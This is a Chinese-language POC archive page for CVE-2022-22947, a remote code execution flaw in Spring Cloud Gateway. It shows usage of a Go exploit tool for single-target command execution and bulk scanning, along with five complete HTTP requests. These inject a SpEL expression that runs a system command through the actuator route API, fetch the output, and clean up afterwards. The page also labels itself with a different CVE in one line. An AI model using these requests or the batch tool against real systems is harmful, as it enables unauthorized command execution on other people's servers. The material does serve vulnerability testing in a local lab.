POC详情: 8af975d4bafb9b1f860d39710c6649cb1de3917b

来源
https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway
关联漏洞
标题: VMware Spring Cloud Gateway 代码注入漏洞 (CVE-2022-22947)
描述:VMware Spring Cloud Gateway是美国威睿(VMware)公司的提供了一个用于在 Spring WebFlux 之上构建 API 网关的库。 VMware Spring Cloud Gateway 存在代码注入漏洞,远程攻击者可利用该漏洞发出恶意的请求并允许在远程主机上执行任意远程命令。
描述
CVE-2021-42013批量
介绍
### Spring Cloud Gateway 远程代码执行漏洞

> 该漏洞对于线上业务风险较高,切勿进行未授权扫描

##### 使用说明
```
╰─ ./CVE-2022-22947 -h                                                                                                                                                                                                                                            ─╯
执行命令:./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami 
批量检测:./CVE-2022-22947 -l url.txt 
```


##### 启动漏洞环境

```
java -jar vuln/spring-gateway-demo-0.0.1-SNAPSHOT.jar 
```

##### 漏洞分为5个请求


第一个请求(发送如下数据包即可添加一个包含恶意SpEL表达式的路由)
```
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 366

{
      "id": "hacktest",
      "filters": [{
        "name": "AddResponseHeader",
        "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
        }],
      "uri": "http://example.com",
      "order": 0
    }
```

第二个请求(刷新刚添加的路由)
```
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

```
第三个请求(查看执行结果)
```
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

```

第四个请求(清理添加的路由)
```
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

```
第五个请求(刷新路由)
```
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.16.91.102:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

```

##### 致谢
> JAR包 from 清水川崎 ; EXP from phith0n
文件快照

 [4.0K]  /data/pocs/8af975d4bafb9b1f860d39710c6649cb1de3917b
├── [ 118]  go.mod
├── [2.1K]  go.sum
├── [5.5K]  main.go
├── [2.9K]  README.md
├── [ 103]  url.txt
└── [4.0K]  vuln
    └── [ 30M]  spring-gateway-demo-0.0.1-SNAPSHOT.jar

1 directory, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。